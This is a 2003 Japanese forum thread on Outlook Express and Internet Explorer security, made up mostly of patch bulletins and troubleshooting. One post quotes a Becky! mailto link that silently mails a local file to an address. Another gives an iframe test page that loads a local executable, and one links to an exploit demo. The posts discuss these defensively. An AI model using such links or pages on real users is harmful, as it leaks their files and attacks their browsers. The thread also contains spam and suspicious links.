OE(又はIEコンポーネント使用メーラー)の問題点とその対策方法

このエントリーをはてなブックマークに追加
381名無しさん@お腹いっぱい。
HotmailとOutlook Expressの組み合わせでウィルス感染する人が多いのでまとめておく。

Hotmailはウィルスチェックをしているとはいうものの、
それはブラウザでHotmailにアクセスした場合に添付ファイルを開く際にチェックするというもので、
メールボックスに入る前に添付ファイルをスキャンするプロバイダのウィルスチェックサービスとは異なる。

さらにOutlook ExpressでHotmailを受信する設定にしているとこのHotmailのウィルスチェック機能は働かず
そのままOutlook Expressのフォルダにウィルスが入ってきてしまう。

またアンチウィルスソフトもメール受信時のスキャンはPOP3のみでHotmailなどのWebメールに対しては行われないので、
この時点でアンチウィルスソフトを常駐させていても反応しない。
ただしアンチウィルスソフトが常駐している場合は、添付ファイルを開くときに反応する。

したがって、Hotmailがウィルススキャンをしているから大丈夫だと誤解して、アンチウィルスソフトを常駐させずに
Outlook ExpressでHotmailを受信する設定にしている場合、ウィルスの添付ファイルは素通りしてくるので、
添付ファイルを開くと感染する。セキュリティホールがある場合には開かなくても感染する。
まとめ
1、HotmailはOutlook Expressで受信せずにブラウザで見に行く。
 ブラウザもOperaやNetscape等のInternet Explorer以外のものが望ましい。
2、アンチウィルスソフトは必ず導入して常駐させておく。ウィルス定義ファイルは常に最新にしておく。
3、Internet Explorer・Outlook ExpressはWindowsUpdateで常に最新の状態にしておく。
383bloom:03/03/06 09:12
>>381
> HotmailとOutlook Expressの組み合わせでウィルス感染する人が多いのでまとめておく。
> Hotmailはウィルスチェックをしているとはいうものの、
> それはブラウザでHotmailにアクセスした場合に添付ファイルを開く際にチェックするというもので、
> メールボックスに入る前に添付ファイルをスキャンするプロバイダのウィルスチェックサービスとは異なる。
> さらにOutlook ExpressでHotmailを受信する設定にしているとこのHotmailのウィルスチェック機能は働かず
> そのままOutlook Expressのフォルダにウィルスが入ってきてしまう。

知らなかった

Hotmailだけの為にOEを使い続けていたけど意味なかったのか
385名無しさん@お腹いっぱい。:03/03/07 13:03
>>384
激しく同意。
>>384-385
テストウィルス"eicar"でテストしてみ。OEだとさっくり入ってくるよ。
でもブラウザでHotmailに行くと、添付ファイルをクリックした時に
「感染しています。どうしますか?」みたいなことを聞いてくる。
387名無しさん@お腹いっぱい。:03/03/07 17:53
>>381
アンチウィルスソフトって一旦受信したOEのフォルダは
スキャンから除外してるから、
Hotmail経由でOEのフォルダにウィルスが入ってても、
スキャンしたときでも発見されないよね。

んでローカルにウィルスがあるといろいろ危ないよね。
なんかの拍子にアンチウィルスソフトが常駐でなくなったときに
クリックでもしたら大変。

OEでHotmail使うのはやめよう。
388名無しさん@お腹いっぱい。:03/03/11 10:24
OE/IE代替として紹介されているOpera6/7にセキュリティホール。
スレ違いだが、一応紹介しておく。

[Opera 7/6] ダウンロード時の長いファイル名で起こるバッファオーバーフローによる脆弱性
http://opera.rainyblue.org/adv/opera02-dlfnbof.php
保守
390名無しさん@お腹いっぱい。:03/03/14 08:45
>>372の不具合まだ修正されないのかなぁ。
長文のメール書いてるとOEが落ちるから、結構ショックだよね。
[VulnWatch] .MHT Buffer Overflow in Internet Explorer
http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0118.html
392MS03-007:03/03/18 08:23
Windows コンポーネントの未チェックのバッファによりWebサーバーが侵害される(MS03-007)
http://www.microsoft.com/japan/technet/security/bulletin/ms03-007.asp
このセキュリティ情報の対象となるユーザー :
 Microsoft(R) Windows(R) 2000 をご使用のシステム管理者
脆弱性の影響 : 攻撃者の任意のコードが実行される
最大深刻度 : 緊急
推奨する対応策 :
 管理者は、直ちにこの修正プログラムをインストールしてください。
影響を受けるソフトウェア :
 ・Microsoft Windows 2000
修正プログラム :
Microsoft Windows 2000:
この問題に対する日本語版修正プログラムは、次のサイトからダウンロード
できます。
・すべての言語 (NEC PC-9800 シリーズを除く)
(WU)
http://www.microsoft.com/downloads/details.aspx?FamilyId=C9A38D45-5145-4844-B62E-C69D32AC929B&displaylang=ja
・NEC PC-9800 シリーズ
(WU)
http://www.microsoft.com/downloads/details.aspx?FamilyID=fbcf9847-d3d6-4493-8dcf-9ba29263c49f&DisplayLang=ja
(WU)このマークの付いている修正プログラムは Windows Update から
インストールすることもできます。
393名無しさん@お腹いっぱい。:03/03/18 16:55
age
394MS03-007:03/03/19 17:23
http://www.microsoft.com/japan/technet/security/bulletin/ms03-007.asp
今回の更新内容
このセキュリティ情報ページを更新し、影響を受ける Windows コンポーネント
を明確にしました。また、「よく寄せられる質問」 に IIS 5.0 に関する質問を
追加し、「修正プログラムに関する追加情報」 の 「警告」 欄に新しい情報を
追加しました。
>>392>>394
OEともIEとも関係なかったり…
396名無しさん@お腹いっぱい。:03/03/19 22:44
>>388の修正済みバージョン、Opera7.03しかなかったが、
Opera6.06も、いまのところ英語版だけだが、リリースされた。
http://www.opera.com/windows/changelogs/606/
ftp://ftp.opera.com/pub/opera/win/606/en/(Opera6.06 EN)

ノルウェーOpera Software,セキュリティ・ ホールを修正した「Opera 7.03」を公開
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030314/1/
397名無しさん@お腹いっぱい。:03/03/20 10:47
Windows全バージョンに「緊急」の脆弱性
http://www.zdnet.co.jp/news/0303/20/nebt_18.html
398MS03-009:03/03/20 10:55
「MS03-009: ISA Server DNS アタック検出フィルタの問題により、サービス拒否が起こる (331065)」
http://www.microsoft.com/japan/technet/security/bulletin/ms03-009ov.asp
対象となる製品:Microsoft ISA Server 2000
399MS03-008:03/03/20 10:56
400名無しさん@お腹いっぱい。:03/03/20 12:33
MS03-008 Windows スクリプト エンジンの問題により、コードが実行される(814078)
日本語ページ
http://www.microsoft.com/japan/technet/security/bulletin/ms03-008ov.asp
Windowsにまたもや「緊急」のホール,すべてのユーザーはWindowsUpdateの実施を
ISA Server 2000には「警告」のセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030320/1/
401名無しさん@お腹いっぱい。:03/03/20 17:32
>>388>>396
「Opera パッケージ版」はセキュリティ・ホールがあるOpera 7.02,ユーザーはバージョン・アップを
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030320/2/
http://www.microsoft.com/japan/ie/downloads/recommended/ie55sp2/default.asp

現在Internet Explorer 5.5SP2/6のダウンロードは停止中、マイクロソフトが確認を行っています。
403名無しさん@お腹いっぱい。:03/03/24 12:13
age
404MS03-007:03/03/26 08:08
「IISを動かしていなくても危険」――Windows 2000の深刻なセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030325/1/
405MS03-007:03/03/26 08:10
相次ぐ「緊急」にマヒするな,IISのホール は“過去最大級”の危険度
パッチ公開前に攻撃コードが存在,既に攻撃されている恐れあり
今週のSecurity Check [Windows編] (第91回,2003年3月26日)
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20030325/1/
406MS03-010:03/03/27 10:48
「MS03-010: RPC エンドポイント マッパーの問題により、サービス拒否の攻撃が実行される (331953)」
http://www.microsoft.com/japan/technet/security/bulletin/ms03-010ov.asp
○概要
この問題は、下記製品のリモート プロシージャ コール (RPC: Remote
Procedure Call) のエンドポイント マッパーに問題があり、サービス拒否の
攻撃を受ける可能性があります。その結果、悪意のあるユーザーにお客様の
コンピューター上のサービスを停止させられる可能性があります。
○対象となる製品
・Microsoft Windows NT 4.0
・Microsoft Windows 2000
・Microsoft Windows XP
407名無しさん@お腹いっぱい。:03/03/27 14:55
>>406
Windows NT/2000/XPの機能を攻撃者が停止できるセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20030327/1/
408MS03-007:03/03/27 17:24
当初の報告よりもずっと深刻だったWindows 2000のセキュリティホール
http://www.zdnet.co.jp/enterprise/0303/26/epn01.html
3月18日に公表されたWindows 2000のセキュリティホールが与える影響は、当初考
えられて いたよりもずっと広範囲に及ぶという。速やかなパッチの適用が必要だ。
409名無しさん@お腹いっぱい。:03/04/07 19:24
Opera 7とNetscape 7.02 Webブラウザにサービス拒否攻撃を受ける弱点
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20030407/1/
410MS03-011:03/04/10 11:40
Microsoft VMにまたもや「緊急」のセキュリティ・ホール,Windowsユーザーはすぐに対策を
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030410/1/
MS03-011 に関する情報
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/MS03-011ov.asp
411名無しさん@お腹いっぱい。:03/04/10 13:06
>>410
これ5MBもあるし、鯖が混んでるのか、なかなか落ちてこないね。
412名無しさん@お腹いっぱい。:03/04/16 10:07
米マイクロソフト,今後1年間のセキュリティの取り組みを明らかに
http://itpro.nikkeibp.co.jp/free/ITPro/USNEWS/20030416/3/
413名無しさん@お腹いっぱい。:03/04/16 19:14
Windows Updateから修正パッチを適用できない問題が発覚,NTユーザーは注意
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030416/1/
414MS03-013:03/04/17 08:18
「MS03-013: Windows カーネル メッセージ処理のバッファ オーバーランにより、権限が昇格する (811493)」
http://www.microsoft.com/japan/technet/security/bulletin/ms03-013ov.asp
影響を受けるソフトウェア
・Microsoft Windows NT 4.0
・Microsoft Windows NT 4.0 Terminal Server Edition
・Microsoft Windows 2000
・Microsoft Windows XP
415名無しさん@お腹いっぱい。:03/04/17 10:13
Windowsに「重要」のセキュリティ・ホール,一般ユーザーに管理者権限を奪われる
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030417/1/
416山崎渉:03/04/17 11:59
(^^)
417名無しさん@お腹いっぱい。:03/04/17 12:38
age
418山崎渉:03/04/20 06:02
   ∧_∧
  (  ^^ )< ぬるぽ(^^)
sage
420名無しさん@お腹いっぱい。:03/04/21 18:10
>>414
のセキュリティパッチいれるとXpのIE6が使い物にならないくらい遅くなるから注意。
アンインストールで元に戻った。
421名無しさん@お腹いっぱい。:03/04/21 19:20
>>420
このあたりで報告されてるのと同じ?
http://winfaq.jp/cgi-bin/bbs2k/wforum.cgi?mode=allread&no=237706&page=50
422名無しさん@お腹いっぱい。:03/04/21 21:28
>>421
俺の場合はIEだけ遅くなった。
パッチID(811493)調べるためにMS03-013のページ開こうとして20分かかった。(通常は10数秒)
その間CPUは100%振り切り(時々CPUステータスのゲットすら出来ない)
コーポレート契約のマカ4.5.1が入ってる。
423cheshire-cat ◆CATBCJABLA :03/04/21 21:55
>攻撃者が攻撃を行うには、直接コンソールで、またはターミナル セッションを介し、標的となるコンピュータに対話的にログオンできることが必要条件となります。
http://www.microsoft.com/japan/technet/security/bulletin/MS03-013.asp

MS03-013って、当面の間は導入する必要性は薄いような予感。
ここ面白かった

http://plaza16.mbn.or.jp/~satchel/
425名無しさん@お腹いっぱい。:03/04/23 11:13
>>410MS03-011関連
Microsoft VMのサポートは2003年末まで,求められるアンインストール機能
相次ぐWindows Updateのトラブル,トラブル情報の周知を
今週のSecurity Check [Windows編] (第93回,2003年4月23日)
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20030422/1/
 ・Microsoft VMに「緊急」のセキュリティ・ホール
 ・Microsoft VMのサポートは2003年末まで
 ・トラブルが続出するWindows Update
 ・Windows カーネルにホール,パッチ適用でパフォーマンスの低下も
 ・ISA Serverにセキュリティ・ホール
 ・Indexing Server for Windows NT 4.0用パッチが公開
 ・TechNet Online セキュリティでは“月例”ドキュメント
426名無しさん@お腹いっぱい。:03/04/24 10:31
IEとOutlook Expressに「緊急」の脆弱性
http://www.zdnet.co.jp/news/0304/24/nebt_06.html
427名無しさん@お腹いっぱい。:03/04/24 10:54
428名無しさん@お腹いっぱい。:03/04/24 11:45
ちょっと前にMS03-014のパッチに問題があって異常終了するって有ったけど
それはもう改善されてんの?
もうMS03-014あてても大丈夫?
429名無しさん@お腹いっぱい。:03/04/24 11:49
>>428
MS03-013では?>>420-423
MS03-014は公表されたばかりだが。
430名無しさん@お腹いっぱい。:03/04/24 11:50
間違えた!
MS03-014じゃなくてMS03-004だった。


MS03-004 適用後 Outlook Express が正しく動作しない
http://support.microsoft.com/default.aspx?scid=kb;ja;814803
431名無しさん@お腹いっぱい。:03/04/24 11:54
オペレーターとチャットで相談って使えんの?
今、初めて知ったんだけど。
432名無しさん@お腹いっぱい。:03/04/24 11:55
>>428
MS03-004だろ。>>365
改善されてないよ。

MS03-014にMS03-004の不具合の修正がされてればいいのだが、詳細不明。
433名無しさん@お腹いっぱい。:03/04/24 11:59
>>432
そうそれ。>>430
ここのところMSはパッチのリリースの速さの方に重点を置いている
ようなので、あわててパッチを当てない方が賢明。

しばらくして不具合報告がないようなら当てる、
自分に必要なパッチかよく検討してみてから当てる(>>423)、が吉。

もっとも、全くWindowsUpdateもしないで素のIE5.01とか使ってるのは論外。
435MS03-014,MS03-015:03/04/24 12:54
>>426-427関連
IEとOutlook Expressに「緊急」のセキュリティ・ホール,Windows Updateの実施を
任意のコードを実行させられる恐れあり
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030424/1/
436名無しさん@お腹いっぱい。:03/04/24 17:24
age
437MS03-007:03/04/24 17:46
http://www.microsoft.com/japan/technet/security/bulletin/ms03-007.asp
今回の更新内容
このセキュリティ情報ページを更新し、脆弱性の調査をさらに続けた結果
Windows NT 4.0 についても同じ脆弱性が存在したため、Windows NT4.0
および Windows NT4.0 Terminal Server Edition 用の修正プログラム
の情報を追加しました。

Windows 2000と同じセキュリティ・ホールがWindows NTに,ただし深刻度は「重要」
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030424/2/
438人柱は!!!!!!!!!:03/04/24 21:15
 
>>438
自分でやれ。
440cheshire-cat ◆CATBCJABLA :03/04/24 22:54
MS03-013不具合 - パフォーマンス低下(XP SP1)
http://www.microsoft.com/japan/technet/security/bulletin/fq03-013.asp
441名無しさん@お腹いっぱい。:03/04/25 10:56
age
Sunの最新JavaランタイムがIEで使えないことが判明したんで
SunのをウンインスコしてMS-VMを最新にしたところ
セキュ確認済みの未認可AxtiveXが動かない
そこでサンドボックス限定で許可したらOK

とゆーことは

SunのプラグインはOSのセキュ設定レベル見てない
サイト鯖自体のセキュ区分で許可の有無はできるが
こういうあいまいな部分で素通しなのか
ネスケみてえだ
443名無しさん@お腹いっぱい。:03/05/02 13:39
「メール本文を開くだけで感染するウイルスに注意」――IPA
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030501/1/
結局shurikenpro買ったよ
445名無しさん@お腹いっぱい。:03/05/03 17:39
Becky! なら安心と思ったら大間違い。セキュリティホールが見つかりました。

http://slashdot.jp/security/03/05/02/2151212.shtml?topic=16


65 名前:名無しさん@お腹いっぱい。 投稿日:03/05/03 17:26 ID:nWmKJb8r
おまいら、大変です!!

mailto:[email protected]?X-Becky-Attachment=C:/Program%20Files/Katjusha/kakikomi.txt
&X-Becky-Action=send&subject=End_of_the_life&body=moudamepo

こんなリンクが張られたら一巻の終わりじゃないですか?
すぐにかちゅーしゃのインスト先を変えるか、mailto:設定を変えましょう!!


67 名前:65 投稿日:03/05/03 17:29 ID:nWmKJb8r
補足。

>>45みたいのだと送信前に確認ダイアログが開くけど、
subjectとbodyを付けると確認なしでメールが送られてしまいます。
だから最新パッチあててるOEの方が安全だってば。
447名無しさん@お腹いっぱい。:03/05/03 17:52
2.05.11キタ━━━━━━(゚∀゚)━━━━━━━!!!!!

http://www.rimarts.co.jp/becky-j.htm
>>440
ウィルスバスターがダメなんだと
>>448
ソースは?
450名無しさん@お腹いっぱい。:03/05/12 17:06
IEとスクリプトの“危険な関係”(上)
スクリプトの脅威
http://itpro.nikkeibp.co.jp/members/NBY/techsquare/20030502/2/
IEとスクリプトの“危険な関係”(中)
クロスサイトが危ない
http://itpro.nikkeibp.co.jp/members/NBY/techsquare/20030502/3/
IEとスクリプトの“危険な関係”(下)
IEがActiveXを利用する仕組み
http://itpro.nikkeibp.co.jp/members/NBY/techsquare/20030502/4/
451動画直リン:03/05/12 17:10
Opera for Windowsに新しいセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20030502/1/
Opera 7.10 for Windowsにオーバーフローによる脆弱性の可能性
http://jp.opera.com/cgi-bin/supsearch2.cgi?options=index&name=j101
453名無しさん@お腹いっぱい。:03/05/15 23:43
Internet Explorerがfile:// リクエストの際にゾーンを無視する
http://www.symantec.com/region/jp/sarcj/security/content/7539.html
454名無しさん@お腹いっぱい。:03/05/16 00:56
>>453
うわっ またなんかすごいの来たー
MSサポートを装うウイルスに注意
http://www.zdnet.co.jp/news/0305/19/njbt_03.html

IEに危険なセキュリティ・ホール,スクリプトを無効にしても攻撃を受ける
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030517/1/

米で“自己消滅するDVD”導入へ
http://www.zdnet.co.jp/news/0305/19/xert_disney.html
>>455
>IEに危険なセキュリティ・ホール,スクリプトを無効にしても攻撃を受ける
これはスゴ過ぎる!
H系DLに紛れ込んで何でもやり放題?
457名無しさん@お腹いっぱい。:03/05/19 20:51
Hotfix出てないんかい
458cheshire-cat ◆CATBCJABLA :03/05/19 20:54
>>453
>>455
やばいやん、それって。幾らなんでもあまりにも。
最近出た中では、一番嫌っすね。

Redlofみたいなhtmlファイル汚染系ウイルスに組み込ませたら、楽しげですが。
>IEに危険なセキュリティ・ホール,スクリプトを無効にしても攻撃を受ける
ここにも記事載ってる
http://www.st.ryukoku.ac.jp/~kjm/security/memo/2003/05.html#20030516_ie
マック版IEも同じ穴があるみたいだね。

ここサンプルページ(要注意)
http://www.malware.com/forceframe.html
460yuis:03/05/19 22:06
27才人妻です。ダンナがかまってくれないので、いつも一人でオナってます。
でも、けっこうオカズに困るんですよね。そんな時見つけたのがYUIS!!
安いし、安心して買えるしなかなかいいですよ!いつもバイブ物買ってます!

http://www.dvd-yuis.com/
ファイルのダウソ禁止してダウソはツール使うしかなさげだな。
Opera使いの俺はだいじょうび
463cheshire-cat ◆CATBCJABLA :03/05/19 22:41
報告。
デモページ踏んでみたんすけど。
20回目位にてNorton Personal Firewallのダイアログが出てきますて。
http://members.tripod.co.jp/nekohako/norton.jpg
「許可しないよん!」だと、無限別窓は消え、インスコまで至らないようでした。
ちょい疲れてるんで、もう寝まする。誰か追試してくだされ。
464cheshire-cat ◆CATBCJABLA :03/05/19 23:02
プロバとどゆ回線契約してるかとか、パソの性能もアリっすかね。

下痢後の酒はちょい体にこたえて。
ちょい吐いてきまする。
>>459
やってみたけど
途中でieがエラー吐いて落ちる。
非力なマシンだと大事にはいたらないのかな?
>>465
(・3・) エェー スラッシュ.に同じような報告あったYO
>>459 のデモ
「現在のセキュリティではDLできません」のダイアログ永遠に開きまくり
IE落としたら「ダウンロードを中止していいですか?」だってw
<FRAME SRC="C:\winnt\****.exe"></FRAME> こんなの並べてるだけでかいな
これマジでやばいよ

Irvineのクリックキャッチを有効にしとくと
1個ずつしかダイアログが出なくなるから大丈夫げ
469山崎渉:03/05/22 02:01
━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―
470(≡゜♀゜≡)):03/05/22 02:38
>>453 >>459 のFixまだ無いの?
472名無しさん@お腹いっぱい。:03/05/28 12:06
またもやパッチに不具合,すべてのパッチをアンインストール可能に
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20030526/1/
ここのところパフォーマンスダウンの問題で、いまだFIXされない奴
溜まってるのに。。
474m:03/05/28 16:06
◎ちょっと見て見て!!◎
http://yahooo.s2.x-beat.com/linkvp/linkvp.html
そろそろ新OS出すために
バグをちらほらと小出しにしてる感じだな
476名無しさん@お腹いっぱい。:03/05/29 00:11
age
477名無しさん@お腹いっぱい。:03/05/29 10:21
最善の対策:MSOE使うな。

--------------------------終了----------------------------
478名無しさん@お腹いっぱい。:03/05/29 12:16
>>477
では、お勧めのメーラは?
>>478
メモ帳以外にあるか?メモ帳以上にいいメーラーがあったら知りたいもんだ。
厨な質問なんですが、ドーナツPしか使ってないんだけどIEのパッチ当ててないと
まずいんですか?
>>480
DonutPはIEコンポーネントブラウザです
>>481
まずいってことですね?
イマイチその言葉の意味がよくわからんで、、、

パッチ当てて出直してきます。
483名無しさん@お腹いっぱい。:03/06/02 21:31
>>440関連
Windows XPでパフォーマンスに悪影響を与えるパッチの改訂版が登場
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20030602/1/
MS03-019 今回の更新内容
攻撃者がコード実行を行える可能性があるため、深刻度を重要に
変更し本セキュリティ情報を変更しました。
修正プログラムを適用済みのお客様は、再適用の必要はありません。
http://www.microsoft.com/japan/technet/security/bulletin/ms03-019.asp

Windows NT/2000のセキュリティ・ホールの深刻度が,より深刻な「重要」に変更
 リモートから任意のコードを実行できることが明らかに
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030602/1/
485名無しさん@お腹いっぱい。:03/06/03 09:28
OEは常にウイルスのターゲットになるからやめとけ

>>478
Edmaxフリー版とか

>>479
どうやってメモ帳をメーラーとして使うんだよ
>>485
「交通事故を起こすので車に乗るのをやめましょう。」って感じの記事だな。

完全にウィルスメールを無くすには以下の仕様のメールソフトになると思う。
・プレーンテキストのみ
・ファイル添付不可
・ハイパーリンク不可
>>485
HTMLメールもウザイが特定のフォントやサイズ以外だと
書式が崩れるメールも止めて欲しい。
>>486
>どうやってメモ帳をメーラーとして使うんだよ

電信8号
EdMAXはメッセージを来たままの状態で保存しないから、糞。
491名無しさん@お腹いっぱい。:03/06/04 10:19
Microsoft,「IE 6 SP1が独立した最後のWebブラウザ」と語る
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20030603/1/
マイクロソフト、IEスタンドアローン版廃止へ
http://japan.cnet.com/news/media/story/0,2000047715,20054861,00.htm
492名無しさん@お腹いっぱい。:03/06/04 10:38
先生方よろしくお願いします。
メールソフトは outlook expressを使用していますが
受信メール、送信メールが全て無くなっています。
何日か前にブラクラ踏んでしまい、その後受信メールだけが全て
無くなっており、何日か過ぎました。
そして今日その間に届いていた受信メール+送信メールが無くなって
いました。
原因は先日踏んだブラクラなのでしょうか?
そしてほっておくとまたこのような事がおきるのでしょうか?
良きアドバイスお願いします。
493_:03/06/04 10:44
>>492
諦めて、OEを再インスコすれ
その際にウィルススキャンするのも忘れずに
495名無しさん@お腹いっぱい。:03/06/04 10:53
>>492
".dbx"でドライブ内を検索してみれ。
メールの保存先が変わっただけなら残っているかもしれない。

ブラクラ踏んで泣く前に、ブラクラチェッカー
http://www.jah.ne.jp/~fild/cgi-bin/LBCC/lbcc.cgi?
496名無しさん@お腹いっぱい。:03/06/04 11:38
>>494>>495さん
ありがとうございました
497MS03-020:03/06/05 09:24
MS03-020: Internet Explorer 用の累積的な修正プログラム (818529)
http://www.microsoft.com/japan/technet/security/bulletin/MS03-020ov.asp
●概要
この修正プログラムは、Internet Explorer に影響を及ぼすセキュリティ上の
問題を排除する累積的な修正プログラムです。
以前に公開された MS03-015 : Internet Explorer 用の累積的な
修正プログラム (813489) で修正された問題に加えて、新たに 2 つの問題を
排除します。
●対象となる製品
・Internet Explorer 6、6 Service Pack 1
・Internet Explorer 5.5 Service Pack 2
・Internet Explorer 5.01 Service Pack 3 for Windows 2000
注意: Internet Explorer 5.01 Service Pack 3 の修正プログラムは、
Windows 2000 環境にのみ適用可能です。
498MS03-020:03/06/05 09:25
●修正プログラム
・Internet Explorer 6 Service Pack 1 (WU)
http://download.microsoft.com/download/3/E/9/3E9E4C1B-C41F-4B24-A08B-AFE2294B499E/q818529.exe

・Internet Explorer 6 Service Pack 1 for Windows Server 2003
http://download.microsoft.com/download/1/F/D/1FD5A702-0B2C-40E0-A940-0CE3749854C2/WindowsServer2003-kb818529-x86-JPN.exe
この修正プログラムは Windows Server 2003 専用になります

・Internet Explorer 6 (WU)
http://download.microsoft.com/download/9/C/B/9CB33CE6-0063-44E9-A641-9E83F5C7C0F5/q818529.exe

・Internet Explorer 5.5 Service Pack 2 (WU)
http://download.microsoft.com/download/1/C/9/1C97DB36-978A-4562-8AA3-3B49ADA6BF04/q818529.exe

・Internet Explorer 5.01 Service Pack 3 (WU)
http://download.microsoft.com/download/F/2/C/F2C1FF05-F40C-4EFC-9117-91209B807921/q818529.exe

注意:64bit 版の Windows をお使いのお客様は、次の修正プログラムの適用を
お願いいたします。

・Windows XP Internet Explorer 6 SP1
http://download.microsoft.com/download/1/E/F/1EF8CF12-6110-494F-976B-0991BAE38A3A/q818529.exe

・Windows Server 2003 Internet Explorer 6 Service Pack 1 (64bit)
http://download.microsoft.com/download/C/5/4/C5458687-A30D-424C-BF79-5A16A57763BA/WindowsServer2003-kb818529-ia64-JPN.exe

(WU) マークの付いている修正プログラムは Windows Update から
インストールすることもできます。
499名無しさん@お腹いっぱい。:03/06/05 13:16
>>497-498
IEに2種類の危険なセキュリティ・ホール,任意のプログラムを実行させられる
マイクロソフトは累積パッチを公開
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030605/1/
今回公開されたセキュリティ・ホールは以下の2種類。
(1)Objectタグの処理に関するセキュリティ・ホール
(2)ファイルのダウンロード・ダイアログに関するセキュリティ・ホール
500名無しさん@お腹いっぱい。:03/06/05 13:37
新たに2つ「緊急」の脆弱性、MSがIE用の累積パッチを公開
マイクロソフトは6月5日、Internet Explorer 6/5.5/5.01用の新たな累積パッチ(MS03-020)を公開した。
http://www.zdnet.co.jp/enterprise/0306/05/epn02.html

501名無しさん@お腹いっぱい。:03/06/05 15:01
>>498 って >>455
"IEに危険なセキュリティ・ホール,スクリプトを無効にしても攻撃を受ける"

のIEでオーバーフロースタック利用してバックグラウンドでDL実行の
Fixですよね?

>>453 のゾーン無視の方はどうなってるのだろ。。。
502名無しさん@お腹いっぱい。:03/06/05 15:35
私も便乗でお尋ねしたいのですが、
>>453の「ゾーン無視」や
>>455の「スクリプトを無効にしても・・・」って、
「IFRAMEのプログラムとファイルの起動」を全ゾーン
(「マイコンピュータ」を含む)で無効にしててもダメですかね?
>>501, >>501
スタックオーバーフローじゃない。大量にダイアログ開こうとしてリソースが足りなくなって失敗する。
IEはそれを「開く」が選択されたと誤解する。シマンテックの「ゾーン無視」は誤り。
どちらもMS03-020で直る(はず)。
>>503
さんきゅです
>>502
どんなに制限してもIEオプションでは非表示の
"zone 0"→My computerがあるからダメじゃない?

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
以下各ゾーン見れば解るよ
>>505
ふつー、この板の住人ならセキュリティセッティングに「マイコンピュータ」が出てくる。
あ! マイコンピューターもちゃんと視野に入ってるのね >>502
508502:03/06/05 16:31
>>507
そうでぃ〜す! いずれにしても、レスありがとうございます。

まぁ他人に聞いてばかりいないで自分で試せばいいのか
と思って>>459のサンプルページ見に行ったのですが、
もうありませんでした。ざんねん。
>>508
↓こんな感じでテストすればいい。ダウンロードダイアログが出たら負け。
>>502の設定じゃ出てくるから負け。

<html>
<body>
<iframe src="file://c|/windows/notepad.exe">
</iframe>
</body>
</html>
510負け犬502:03/06/05 16:56
>>509
さっそくやってみました。たしかに出ました、ダイアログが!
な〜るほど、こういうことなんですねぇ・・・。
ありがとうございますた。
511名無しさん@お腹いっぱい。:03/06/05 23:34
「ファイル交換ソフトで感染を広げるウイルスの届け出数が急増中」――IPA
ブラウザ・クラッシャによる被害も増加中,設定変更やIE以外のブラウザの使用を
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030605/2/

コンピュータウイルスの届出状況について
http://www.ipa.go.jp/security/txt/2003/06.html
512名無しさん@お腹いっぱい。:03/06/06 10:39
メール機能を悪用する主なウイルス一覧
情報処理振興事業協会セキュリティセンター(IPA/ISEC)
http://www.ipa.go.jp/security/topics/mail_aware.html
最終更新日:2003年 6月 5日
513名無しさん@お腹いっぱい。:03/06/07 00:27
age
514名無しさん@お腹いっぱい。:03/06/09 22:49
age
515とも:03/06/09 22:51
516名無しさん@お腹いっぱい。:03/06/10 12:42
>>485
【結果発表】HTMLメールをどう思いますか?
http://itpro.nikkeibp.co.jp/free/ITPro/OPINION/20030609/1/
【川崎憲次郎投手をオールスターに!】

ヤクルト時代は88勝を挙げ'98には最多勝のタイトルを獲得。特に巨人戦には滅法
強く、現役最多の勝利数を誇る。'00年オフにFA権を行使し打倒読売、そして優勝
請負人として満を持して中日入団。
背番号20は元祖燃える男・星野仙一が着けていた番号だった。
しかしここからが苦難の始まりだった。 度重なるケガ。
エースとしての働きを期待されながら2軍で、練習すらできない日々。
2年間一軍で1球も投げていない。
ファンはその巨人キラーの異名と熱い期待をいまだに忘れることができない。
3年契約の3年目、ようやく傷も癒え練習を再開。彼にふさわしい舞台とは?
そう彼に相応しい復活の舞台はオールスターだ!
↓【憲次郎への投票はこちらから】↓
http://allstar.sanyo.co.jp/
6月10日時点の選手別投票数http://allstar.sanyo.co.jp/result/detail.html



      
518名無しさん@お腹いっぱい。:03/06/15 23:10
セキュリティ・ホールを修正した「Opera7.11 for Windows 日本語版」が公開
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030612/1/
>>518
スレ違いだろ。
MS03-020って烈しく無意味なのですが・・
http://www.malware.com/forceframe.html
>>520
Operaもだめみたい
mozillaは大丈夫
>>520氏ね厨房
大質量IFRAME
iframe タグが大量にあります。
高い確率で悪意があるものと考えられます。
ヽ(`Д´)ノ ウワァァァァーーーーーーン!!!
>>520
任意のアプリケーションが実行されるセキュリティホールは対策したが
ファイルのダウンロードが表示されてブラクラ状態になるのは放置ですね。

大量のウィンドウ表示を制限する機能をWindowsに付けて欲しいよ。
525名無しさん@お腹いっぱい。 :03/06/17 13:19
ウインドーズ98は、もう更新できないのでしょうか?
更新しようとしても、98についの説明がありません。

それと、インテリマウスがしょっちゅう自動的にクリック
するようになってしまうのはブリクラと関係があるのでしょうか?
